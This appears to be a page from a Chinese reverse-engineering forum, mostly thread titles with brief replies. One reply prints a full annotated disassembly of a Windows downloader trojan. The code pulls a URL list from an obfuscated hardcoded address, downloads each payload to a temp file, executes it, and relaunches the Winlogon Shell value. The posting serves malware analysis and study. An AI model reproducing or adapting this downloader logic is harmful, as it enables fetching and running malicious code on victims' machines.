[Help] Does the CPU switch the control registers cr0~cr4 when it switches processes?
Some material on control registers, not sure whether it helps you: 40fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4J5j5i4A6&6j5$3!0V1k6i4u0Q4x3X3g2U0L8W2)9J5c8X3#2&6M7r3c8X3i4K6u0r3y4o6M7^5x3o6g2Q4x3X3g2H3k6r3j5`.

[Share] Brand-new original anti-rootkit tool SysReveal, welcome to try it
Bump.........

[Help] windbg LAN debugging setup
So frustrating. Thanks anyway...

[Help] Restoring INT1 causes a blue screen
Learned something. Thanks qihoocom for the pointers...

[Original] virut analysis
Support. Great write-up. First reply?

[Download] Driver programming fundamentals collection (chm version)
Downloaded. Thanks.

[Share] My driver study notes
Learning. Thanks OP....

[Discussion] Posting a high-quality downloader sample
Unpacked it and had a look; there is nothing much to it, it is all very straightforward. Won't say more... Thanks to the author for the learning opportunity...

; sub_401000: takes a path on the stack and launches it with CreateProcessA
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 83C4 AC add esp,-54
00401006 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401009 50 push eax
0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA
0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54]
00401012 50 push eax
00401013 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401016 50 push eax
00401017 6A 00 push 0
00401019 6A 00 push 0
0040101B 6A 20 push 20
0040101D 6A 00 push 0
0040101F 6A 00 push 0
00401021 6A 00 push 0
00401023 FF75 08 push dword ptr ss:[ebp+8]
00401026 6A 00 push 0
00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA
0040102D 0BC0 or eax,eax
0040102F 75 10 jnz short du_1.00401041
00401031 FF75 B0 push dword ptr ss:[ebp-50]
00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401039 FF75 AC push dword ptr ss:[ebp-54]
0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401041 C9 leave
00401042 C2 0400 retn 4

; sub_401045(url, path, timeout): fetches url over WinINet and writes it to path; returns the number of 0x200-byte chunks written (0 on failure)
00401045 55 push ebp
00401046 8BEC mov ebp,esp
00401048 81C4 E8FDFFFF add esp,-218
0040104E 33C0 xor eax,eax
00401050 8945 E8 mov dword ptr ss:[ebp-18],eax
00401053 6A 00 push 0
00401055 6A 00 push 0
00401057 6A 00 push 0
00401059 6A 00 push 0
0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA
00401065 0BC0 or eax,eax
00401067 0F84 F1000000 je du_1.0040115E
0040106D 8945 FC mov dword ptr ss:[ebp-4],eax
00401070 6A 04 push 4
00401072 FF75 10 push dword ptr ss:[ebp+10]
00401075 6A 02 push 2
00401077 FF75 FC push dword ptr ss:[ebp-4]
0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040107F 6A 04 push 4
00401081 FF75 10 push dword ptr ss:[ebp+10]
00401084 6A 06 push 6
00401086 FF75 FC push dword ptr ss:[ebp-4]
00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040108E 6A 00 push 0
00401090 68 00000020 push 20000000
00401095 6A 00 push 0
00401097 6A 00 push 0
00401099 FF75 08 push dword ptr ss:[ebp+8]
0040109C FF75 FC push dword ptr ss:[ebp-4]
0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA
004010A4 0BC0 or eax,eax
004010A6 0F84 AA000000 je du_1.00401156
004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax
004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200
004010BD FF75 EC push dword ptr ss:[ebp-14]
004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010C3 50 push eax
004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
004010CA 50 push eax
004010CB 6A 13 push 13
004010CD FF75 F8 push dword ptr ss:[ebp-8]
004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA
004010D5 0BC0 or eax,eax
004010D7 74 75 je short du_1.0040114E
004010D9 6A 00 push 0
004010DB 6A 00 push 0
004010DD 6A 04 push 4
004010DF 6A 00 push 0
004010E1 6A 00 push 0
004010E3 68 00000040 push 40000000
004010E8 FF75 0C push dword ptr ss:[ebp+C]
004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA
004010F0 83F8 FF cmp eax,-1
004010F3 74 59 je short du_1.0040114E
004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax
004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14]
00401102 50 push eax
00401103 68 00020000 push 200
00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
0040110E 50 push eax
0040110F FF75 F8 push dword ptr ss:[ebp-8]
00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile
00401117 0BC0 or eax,eax
00401119 74 23 je short du_1.0040113E
0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0
0040111F 74 1D je short du_1.0040113E
00401121 FF45 E8 inc dword ptr ss:[ebp-18]
00401124 6A 00 push 0
00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401129 50 push eax
0040112A FF75 EC push dword ptr ss:[ebp-14]
0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
00401133 50 push eax
00401134 FF75 F4 push dword ptr ss:[ebp-C]
00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile
0040113C ^ EB BA jmp short du_1.004010F8
0040113E FF75 F4 push dword ptr ss:[ebp-C]
00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile
00401146 FF75 F4 push dword ptr ss:[ebp-C]
00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
0040114E FF75 F8 push dword ptr ss:[ebp-8]
00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
00401156 FF75 FC push dword ptr ss:[ebp-4]
00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18]
00401161 C9 leave
00401162 C2 0C00 retn 0C

; sub_401165 (thread routine): copies its URL argument, picks a temp file name, and retries sub_401045 up to 0x3C times with a 1 s sleep; on success runs the file via sub_401000, then decrements the thread counter at ds:[403000]
00401165 55 push ebp
00401166 8BEC mov ebp,esp
00401168 81C4 FCFDFFFF add esp,-204
0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C
00401175 FF75 08 push dword ptr ss:[ebp+8]
00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
0040117E 50 push eax
0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA
00401184 68 00010000 push 100
00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118F 50 push eax
00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax
0040119C 6A 00 push 0
0040119E 6A 00 push 0
004011A0 68 04304000 push du_1.00403004
004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004011AA 68 88130000 push 1388
004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011B5 50 push eax
004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
004011BC 50 push eax
004011BD E8 83FEFFFF call du_1.00401045
004011C2 0BC0 or eax,eax
004011C4 74 10 je short du_1.004011D6
004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011CC 50 push eax
004011CD E8 2EFEFFFF call du_1.00401000
004011D2 EB 15 jmp short du_1.004011E9
004011D4 EB 0D jmp short du_1.004011E3
004011D6 68 E8030000 push 3E8
004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep
004011E0 FF4D FC dec dword ptr ss:[ebp-4]
004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0
004011E7 ^ 75 C1 jnz short du_1.004011AA
004011E9 FF0D 00304000 dec dword ptr ds:[403000]
004011EF C9 leave
004011F0 C2 0400 retn 4

///////////// entry point
; loads user32 and calls LoadRemoteFonts, relaunches the Winlogon\Shell value, waits for connectivity, downloads a list to a temp file, then starts one sub_401165 thread per line and waits until the counter at ds:[403000] drops to zero
004011F3 55 push ebp
004011F4 8BEC mov ebp,esp
004011F6 81C4 E8FEFFFF add esp,-118
004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll"
00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA
00401206 0BC0 or eax,eax
00401208 74 11 je short du_1.0040121B
0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts"
0040120F 50 push eax
00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress
00401215 0BC0 or eax,eax
00401217 74 02 je short du_1.0040121B
00401219 FFD0 call eax
0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040121E 50 push eax
0040121F 68 19000200 push 20019
00401224 6A 00 push 0
00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040122B 68 02000080 push 80000002
00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA
00401235 0BC0 or eax,eax
00401237 75 48 jnz short du_1.00401281
00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104
00401240 68 04010000 push 104
00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040124B 50 push eax
0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401254 50 push eax
00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040125B 50 push eax
0040125C 6A 00 push 0
0040125E 6A 00 push 0
00401260 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401265 FF75 FC push dword ptr ss:[ebp-4]
00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA
0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401273 50 push eax
00401274 E8 87FDFFFF call du_1.00401000
00401279 FF75 FC push dword ptr ss:[ebp-4]
0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey
00401281 68 E8030000 push 3E8
00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep
0040128B 6A 00 push 0
0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401290 50 push eax
00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState
00401296 0BC0 or eax,eax
00401298 75 02 jnz short du_1.0040129C
0040129A ^ EB EF jmp short du_1.0040128B
0040129C 68 04010000 push 104
004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012A7 50 push eax
004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012B3 50 push eax
004012B4 6A 00 push 0
004012B6 6A 00 push 0
004012B8 68 04304000 push du_1.00403004
004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004012C2 68 E8030000 push 3E8
004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep
004012CC 68 88130000 push 1388
004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012D7 50 push eax
004012D8 68 5D304000 push du_1.0040305D ; ASCII "f6eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3&6A6L8h3q4T1K9g2)9J5k6h3u0W2i4K6u0W2L8h3q4Q4x3V1k6T1i4K6u0r3j5g2)9J5c8X3#2Q4x3X3g2@1P5s2b7`."
004012DD E8 63FDFFFF call du_1.00401045
004012E2 0BC0 or eax,eax
004012E4 75 02 jnz short du_1.004012E8
004012E6 ^ EB E4 jmp short du_1.004012CC
004012E8 6A 00 push 0
004012EA 6A 00 push 0
004012EC 6A 03 push 3
004012EE 6A 00 push 0
004012F0 6A 00 push 0
004012F2 68 00000080 push 80000000
004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012FD 50 push eax
004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA
00401303 83F8 FF cmp eax,-1
00401306 0F84 CC000000 je du_1.004013D8
0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax
0040130F 6A 00 push 0
00401311 FF75 F4 push dword ptr ss:[ebp-C]
00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize
00401319 83F8 0F cmp eax,0F
0040131C 0F82 9F000000 jb du_1.004013C1
00401322 6A 00 push 0
00401324 6A 00 push 0
00401326 6A 00 push 0
00401328 6A 02 push 2
0040132A 6A 00 push 0
0040132C FF75 F4 push dword ptr ss:[ebp-C]
0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA
00401334 0BC0 or eax,eax
00401336 0F84 92000000 je du_1.004013CE
0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax
0040133F 6A 00 push 0
00401341 6A 00 push 0
00401343 6A 00 push 0
00401345 6A 04 push 4
00401347 50 push eax
00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile
0040134D 0BC0 or eax,eax
0040134F 74 66 je short du_1.004013B7
00401351 8945 EC mov dword ptr ss:[ebp-14],eax
00401354 8BF0 mov esi,eax
; line parser: copies bytes until CR/LF, then spawns a thread for each non-empty line
00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118]
0040135C 68 04010000 push 104
00401361 57 push edi
00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401367 AC lods byte ptr ds:[esi]
00401368 3C 0A cmp al,0A
0040136A 75 01 jnz short du_1.0040136D
0040136C AC lods byte ptr ds:[esi]
0040136D 3C 0D cmp al,0D
0040136F 75 39 jnz short du_1.004013AA
00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0
00401378 74 2E je short du_1.004013A8
0040137A FF05 00304000 inc dword ptr ds:[403000]
00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401383 50 push eax
00401384 6A 00 push 0
00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040138C 50 push eax
0040138D 68 65114000 push du_1.00401165
00401392 6A 00 push 0
00401394 6A 00 push 0
00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread
0040139B 50 push eax
0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013A1 6A 64 push 64
004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013A8 ^ EB AC jmp short du_1.00401356
004013AA AA stos byte ptr es:[edi]
004013AB 0AC0 or al,al
004013AD ^ 75 B8 jnz short du_1.00401367
004013AF FF75 EC push dword ptr ss:[ebp-14]
004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile
004013B7 FF75 F0 push dword ptr ss:[ebp-10]
004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013BF EB 0D jmp short du_1.004013CE
004013C1 FF75 F4 push dword ptr ss:[ebp-C]
004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC
004013CE FF75 F4 push dword ptr ss:[ebp-C]
004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013D6 EB 05 jmp short du_1.004013DD
004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC
004013DD EB 07 jmp short du_1.004013E6
004013DF 6A 64 push 64
004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0
004013ED ^ 75 F0 jnz short du_1.004013DF
004013EF 6A 00 push 0
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess

; import thunks
004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle
004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA
00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA
00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA
0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread
00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess
0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize
00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress
00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA
0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA
00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA
00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile
0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory
00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile
0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep
00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile
0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA
00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey
00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA
0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA
00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA
0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle
00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState
00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA
0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA
00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile
00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA

[Original] Analysis of a memory-reading game trojan
The legendary first reply?

[Original] Introduction to Cryptography series (4): the Vigenère cipher (classical)
Simple and easy to understand. Support.

[Share] Made two narrated videos with a full walkthrough of a packer; experts feel free to skip
Support....

[Discussion] Should the forum open a "Mobile Security" section?
Definitely necessary... Support 看雪..

[Help] Anyone who knows driver programming, please come in
Awesome~~~~!
